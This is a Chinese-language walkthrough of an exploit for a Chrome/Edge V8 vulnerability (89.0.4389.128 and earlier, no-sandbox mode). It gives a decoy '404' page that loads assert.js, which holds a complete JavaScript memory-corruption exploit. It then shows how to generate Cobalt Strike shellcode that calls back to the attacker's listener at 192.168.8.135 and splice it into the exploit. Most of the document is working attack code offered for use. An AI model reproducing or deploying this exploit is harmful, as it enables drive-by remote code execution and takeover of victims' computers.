漏洞介绍

Google Chrome 是由 Google 开发的免费网页浏览器。
经测试，此漏洞影响 Chrome 最新正式版（89.0.4389.128）以及基于 Chromium内核的 Microsoft Edge 正式版（89.0.774.76）。
攻击者可通过构造特制 Web 页面并诱导受害者访问来利用此漏洞获得远程代码执行。
Chrome 一直是很多用户使用的浏览器，最新出来了一个 Chrome 0 Day ，可以执行任意命令，不过前提条件是需要 chrome 开启 –no-sandbox 无沙盒模式。

沙箱介绍

Chromium 渲染引擎涉及大量 C++ 编写的组件，出现漏洞的概率不小。因此，基于纵深防御理念浏览器引入了涉及三层结构。渲染引擎等组件不直接与系统交互，而是通过一个被称为MOJO的IPC组件与浏览器引擎通讯（也被称为：broker），再与系统交互。进而可以实现：即便沙箱中的进程被攻破，但无法随意调用系统API产生更大的危害。有点类似：即便攻破了一个容器实例，在没有逃逸或提权漏洞的情况下，宿主机安全一定程度上不受影响（实际上，浏览器的Sandbox和容器隔离的部分技术原理是相似的）。

影响范围

Google Chrome <= 89.0.4389.128
基于 Chromium 内核的 Microsoft Edge <= 89.0.774.76
经测试：
- 32 位的系统不能复现
- 32 位的 Chrome 不能复现
历史 Google Chrome 下载地址：https://downzen.com/en/windows/google-chrome/versions/

主机上线

前情提要：
- 靶机环境
  - 系统：Windows 7 SP 1
  - Chrome：89.0.4389.114 正式版 64 位
- 环境说明：
  - 靶机地址：192.168.8.138
  - Kali 地址：192.168.8.135
由于这个漏洞不好使用 POC 验证，都是直接看版本和是否沙箱，就不验证了。
EXP 地址：https://github.com/AeolusTF/chrome-0day

前期准备

404 页面：

<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
  <title>404</title>
  <script src="assert.js"></script>
  <style>
    body{
      font: 16px arial,'Microsoft Yahei','Hiragino Sans GB',sans-serif;
    }
    h1{
      margin: 0;
      color:#3a87ad;
      font-size: 26px;
      text-align: center;
    }
    .content{
      width: 45%;
      margin: 0 auto;
    }
    .content >div{
      margin-top: 50px;
      padding: 20px;
      background: #d9edf7;
      border-radius: 12px;
    }
  </style>
</head>
<body>
<div class="content">
  <div>
    <h1>404 - Page Not Found 未找到</h1>
  </div>
</div>
</body>
</html>

assert.js 内容：

function gc() {
    for (var i = 0; i < 0x80000; ++i) {
        var a = new ArrayBuffer();
    }
}
let shellcode = [];
var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var main = wasmInstance.exports.main;
var bf = new ArrayBuffer(8);
var bfView = new DataView(bf);
function fLow(f) {
    bfView.setFloat64(0, f, true);
    return (bfView.getUint32(0, true));
}
function fHi(f) {
    bfView.setFloat64(0, f, true);
    return (bfView.getUint32(4, true))
}
function i2f(low, hi) {
    bfView.setUint32(0, low, true);
    bfView.setUint32(4, hi, true);
    return bfView.getFloat64(0, true);
}
function f2big(f) {
    bfView.setFloat64(0, f, true);
    return bfView.getBigUint64(0, true);
}
function big2f(b) {
    bfView.setBigUint64(0, b, true);
    return bfView.getFloat64(0, true);
}
class LeakArrayBuffer extends ArrayBuffer {
    constructor(size) {
        super(size);
        this.slot = 0xb33f;
    }
}
function foo(a) {
    let x = -1;
    if (a) x = 0xFFFFFFFF;
    var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
    arr.shift();
    let local_arr = Array(2);
    local_arr[0] = 5.1;//4014666666666666
    let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8
    arr[0] = 0x1122;
    return [arr, local_arr, buff];
}
for (var i = 0; i < 0x10000; ++i)
    foo(false);
gc(); gc();
[corrput_arr, rwarr, corrupt_buff] = foo(true);
corrput_arr[12] = 0x22444;
delete corrput_arr;
function setbackingStore(hi, low) {
    rwarr[4] = i2f(fLow(rwarr[4]), hi);
    rwarr[5] = i2f(low, fHi(rwarr[5]));
}
function leakObjLow(o) {
    corrupt_buff.slot = o;
    return (fLow(rwarr[9]) - 1);
}
let corrupt_view = new DataView(corrupt_buff);
let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
let idx0Addr = corrupt_buffer_ptr_low - 0x10;
let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
let delta = baseAddr + 0x1c - idx0Addr;
if ((delta % 8) == 0) {
    let baseIdx = delta / 8;
    this.base = fLow(rwarr[baseIdx]);
} else {
    let baseIdx = ((delta - (delta % 8)) / 8);
    this.base = fHi(rwarr[baseIdx]);
}
let wasmInsAddr = leakObjLow(wasmInstance);
setbackingStore(wasmInsAddr, this.base);
let code_entry = corrupt_view.getFloat64(13 * 8, true);
setbackingStore(fLow(code_entry), fHi(code_entry));
for (let i = 0; i < shellcode.length; i++) {
    corrupt_view.setUint8(i, shellcode[i]);
}
main();

CS 上线

CS 安装过程略，生成监听器：

生成 ShellCode：

内容如下：

1
2

/* length: 927 bytes */
unsigned char buf[] = "x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x53\x56\x53\x45\x29\x0d\x0a\x00\xf6\xed\x69\xaf\x1b\xd2\x83\xe6\xc0\x44\x9b\xd9\x1f\x9e\xf3\x07\x3f\xaf\x4d\xf8\xc8\x0e\x84\xb8\xad\x53\xdc\x80\xd4\xc6\xfc\xde\xa0\xa7\xc3\x7f\x73\x63\x78\xd5\xd9\xa5\x96\xc6\x94\xa0\xc5\xdc\xbd\x3d\x0d\x90\x7b\xa6\x84\xb5\xe3\xad\x82\x7d\xa0\x16\xed\xef\x03\x1c\x86\x8c\xbc\x06\x17\xf8\x13\x3a\xd8\x8f\x90\x06\x8f\xca\x84\xad\x17\x9b\xf1\x90\x58\x59\x41\x8a\xd3\x7d\x65\xab\x7e\xce\xa9\x1d\xbb\x42\x75\x50\x34\x89\x13\x57\x6e\x42\xd8\xd3\x24\xf8\x6e\x55\x79\x33\xd6\xc1\x26\xf6\xf0\x9a\x4a\x3c\x56\xc6\xc1\x8a\x63\x29\x3c\x6e\xc7\x4d\xf4\x27\xed\x88\x55\x7e\x4b\x11\x53\x85\x80\x64\x3f\xbe\x9c\x4f\x64\xef\x3d\xc1\x42\xf1\x8e\x44\x1b\x08\x95\x91\xbb\x64\xac\x8b\x3f\x86\x99\xf5\xbb\xe4\xb3\x36\x66\xc0\x4a\x82\xb1\x51\x85\xe8\xfa\xd4\x9c\x40\xaf\x2b\x5c\x6d\xb5\xdf\xae\xbc\xd4\x69\x78\x6c\xa7\xdd\x13\x27\xbc\x30\x1c\x29\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x38\x2e\x31\x33\x35\x00\x17\x50\x65\xea";

通过文本编辑器修改成如下样式：

0x42,0x76,0x39,0x73,0x71,0x58,0x72,0x59,0x30,0x62,0x5a,0x69,0x6b,0x5a,0x62,0x4b,0x6d,0x37,0x6d,0x66,0x4d,0x43,0x32,0x43,0x6c,0x63,0x4c,0x68,0x68,0x53,0x72,0x31,0x4b,0x39,0x52,0x43,0x72,0x77,0x49,0x5a,0x68,0x69,0x54,0x49,0x72,0x2d,0x75,0x33,0x58,0x64,0x4d,0x6c,0x6f,0x4e,0x30,0x6c,0x39,0x34,0x33,0x7a,0x68,0x66,0x38,0x00,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x00,0x32,0xa8,0x84,0x00,0x00,0x00,0x00,0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x6a,0x1f,0x5a,0x52,0x68,0x80,0x33,0x00,0x00,0x49,0x89,0xe0,0x6a,0x04,0x41,0x59,0x49,0xba,0x75,0x46,0x9e,0x86,0x00,0x00,0x00,0x00,0xff,0xd5,0x4d,0x31,0xc0,0x53,0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,0x00,0x00,0x49,0xba,0x44,0xf0,0x35,0xe0,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0xff,0xcf,0x74,0x02,0xeb,0xaa,0xe8,0x55,0x00,0x00,0x00,0x53,0x59,0x6a,0x40,0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x00,0x10,0x00,0x00,0x49,0xba,0x58,0xa4,0x53,0xe5,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x00,0x20,0x00,0x00,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5

和 MSF 一样，裁剪一下拼接到 assert.js 中：

function gc() {
    for (var i = 0; i < 0x80000; ++i) {
        var a = new ArrayBuffer();
    }
}
let shellcode = [0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x48,0x31,0xc9,0x48,0x31,0xd2,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x41,0x50,0x41,0x50,0x41,0xba,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xe9,0x93,0x00,0x00,0x00,0x5a,0x48,0x89,0xc1,0x41,0xb8,0xbb,0x01,0x00,0x00,0x4d,0x31,0xc9,0x41,0x51,0x41,0x51,0x6a,0x03,0x41,0x51,0x41,0xba,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x79,0x5b,0x48,0x89,0xc1,0x48,0x31,0xd2,0x49,0x89,0xd8,0x4d,0x31,0xc9,0x52,0x68,0x00,0x32,0xc0,0x84,0x52,0x52,0x41,0xba,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x48,0x83,0xc3,0x50,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0xba,0x1f,0x00,0x00,0x00,0x6a,0x00,0x68,0x80,0x33,0x00,0x00,0x49,0x89,0xe0,0x41,0xb9,0x04,0x00,0x00,0x00,0x41,0xba,0x75,0x46,0x9e,0x86,0xff,0xd5,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0xff,0xff,0xff,0xff,0x4d,0x31,0xc9,0x52,0x52,0x41,0xba,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x0f,0x85,0x9d,0x01,0x00,0x00,0x48,0xff,0xcf,0x0f,0x84,0x8c,0x01,0x00,0x00,0xeb,0xb3,0xe9,0xe4,0x01,0x00,0x00,0xe8,0x82,0xff,0xff,0xff,0x2f,0x76,0x4e,0x4f,0x4a,0x00,0x7b,0x2d,0x7f,0xd9,0x96,0xf3,0xa8,0x38,0x62,0x6b,0x2b,0xb1,0x19,0xfd,0x1f,0xba,0xbb,0x8e,0x4a,0x01,0x20,0xa2,0xcb,0x08,0xf9,0x16,0x7e,0xa3,0x4f,0x24,0x27,0x1e,0xa4,0xce,0xd1,0x28,0x95,0x68,0xb8,0xbf,0x8d,0xf8,0x16,0x7e,0x00,0x4b,0xc3,0x2b,0x93,0x17,0xc7,0x9f,0x36,0x28,0x80,0x65,0xea,0x88,0x02,0xcf,0x94,0xcd,0x9e,0x19,0x43,0x89,0x70,0x21,0xd5,0x90,0xb7,0xbc,0x59,0x00,0x55,0x73,0x65,0x72,0x2d,0x41,0x67,0x65,0x6e,0x74,0x3a,0x20,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x39,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x36,0x2e,0x31,0x3b,0x20,0x57,0x4f,0x57,0x36,0x34,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x35,0x2e,0x30,0x3b,0x20,0x42,0x4f,0x49,0x45,0x39,0x3b,0x53,0x56,0x53,0x45,0x29,0x0d,0x0a,0x00,0xf6,0xed,0x69,0xaf,0x1b,0xd2,0x83,0xe6,0xc0,0x44,0x9b,0xd9,0x1f,0x9e,0xf3,0x07,0x3f,0xaf,0x4d,0xf8,0xc8,0x0e,0x84,0xb8,0xad,0x53,0xdc,0x80,0xd4,0xc6,0xfc,0xde,0xa0,0xa7,0xc3,0x7f,0x73,0x63,0x78,0xd5,0xd9,0xa5,0x96,0xc6,0x94,0xa0,0xc5,0xdc,0xbd,0x3d,0x0d,0x90,0x7b,0xa6,0x84,0xb5,0xe3,0xad,0x82,0x7d,0xa0,0x16,0xed,0xef,0x03,0x1c,0x86,0x8c,0xbc,0x06,0x17,0xf8,0x13,0x3a,0xd8,0x8f,0x90,0x06,0x8f,0xca,0x84,0xad,0x17,0x9b,0xf1,0x90,0x58,0x59,0x41,0x8a,0xd3,0x7d,0x65,0xab,0x7e,0xce,0xa9,0x1d,0xbb,0x42,0x75,0x50,0x34,0x89,0x13,0x57,0x6e,0x42,0xd8,0xd3,0x24,0xf8,0x6e,0x55,0x79,0x33,0xd6,0xc1,0x26,0xf6,0xf0,0x9a,0x4a,0x3c,0x56,0xc6,0xc1,0x8a,0x63,0x29,0x3c,0x6e,0xc7,0x4d,0xf4,0x27,0xed,0x88,0x55,0x7e,0x4b,0x11,0x53,0x85,0x80,0x64,0x3f,0xbe,0x9c,0x4f,0x64,0xef,0x3d,0xc1,0x42,0xf1,0x8e,0x44,0x1b,0x08,0x95,0x91,0xbb,0x64,0xac,0x8b,0x3f,0x86,0x99,0xf5,0xbb,0xe4,0xb3,0x36,0x66,0xc0,0x4a,0x82,0xb1,0x51,0x85,0xe8,0xfa,0xd4,0x9c,0x40,0xaf,0x2b,0x5c,0x6d,0xb5,0xdf,0xae,0xbc,0xd4,0x69,0x78,0x6c,0xa7,0xdd,0x13,0x27,0xbc,0x30,0x1c,0x29,0x00,0x41,0xbe,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x31,0xc9,0xba,0x00,0x00,0x40,0x00,0x41,0xb8,0x00,0x10,0x00,0x00,0x41,0xb9,0x40,0x00,0x00,0x00,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x41,0xb8,0x00,0x20,0x00,0x00,0x49,0x89,0xf9,0x41,0xba,0x12,0x96,0x89,0xe2,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb6,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd7,0x58,0x58,0x58,0x48,0x05,0x00,0x00,0x00,0x00,0x50,0xc3,0xe8,0x7f,0xfd,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x38,0x2e,0x31,0x33,0x35,0x00,0x17,0x50,0x65,0xea];
var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var main = wasmInstance.exports.main;
var bf = new ArrayBuffer(8);
var bfView = new DataView(bf);
function fLow(f) {
    bfView.setFloat64(0, f, true);
    return (bfView.getUint32(0, true));
}
function fHi(f) {
    bfView.setFloat64(0, f, true);
    return (bfView.getUint32(4, true))
}
function i2f(low, hi) {
    bfView.setUint32(0, low, true);
    bfView.setUint32(4, hi, true);
    return bfView.getFloat64(0, true);
}
function f2big(f) {
    bfView.setFloat64(0, f, true);
    return bfView.getBigUint64(0, true);
}
function big2f(b) {
    bfView.setBigUint64(0, b, true);
    return bfView.getFloat64(0, true);
}
class LeakArrayBuffer extends ArrayBuffer {
    constructor(size) {
        super(size);
        this.slot = 0xb33f;
    }
}
function foo(a) {
    let x = -1;
    if (a) x = 0xFFFFFFFF;
    var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
    arr.shift();
    let local_arr = Array(2);
    local_arr[0] = 5.1;//4014666666666666
    let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8
    arr[0] = 0x1122;
    return [arr, local_arr, buff];
}
for (var i = 0; i < 0x10000; ++i)
    foo(false);
gc(); gc();
[corrput_arr, rwarr, corrupt_buff] = foo(true);
corrput_arr[12] = 0x22444;
delete corrput_arr;
function setbackingStore(hi, low) {
    rwarr[4] = i2f(fLow(rwarr[4]), hi);
    rwarr[5] = i2f(low, fHi(rwarr[5]));
}
function leakObjLow(o) {
    corrupt_buff.slot = o;
    return (fLow(rwarr[9]) - 1);
}
let corrupt_view = new DataView(corrupt_buff);
let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
let idx0Addr = corrupt_buffer_ptr_low - 0x10;
let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
let delta = baseAddr + 0x1c - idx0Addr;
if ((delta % 8) == 0) {
    let baseIdx = delta / 8;
    this.base = fLow(rwarr[baseIdx]);
} else {
    let baseIdx = ((delta - (delta % 8)) / 8);
    this.base = fHi(rwarr[baseIdx]);
}
let wasmInsAddr = leakObjLow(wasmInstance);
setbackingStore(wasmInsAddr, this.base);
let code_entry = corrupt_view.getFloat64(13 * 8, true);
setbackingStore(fLow(code_entry), fHi(code_entry));
for (let i = 0; i < shellcode.length; i++) {
    corrupt_view.setUint8(i, shellcode[i]);
}
main();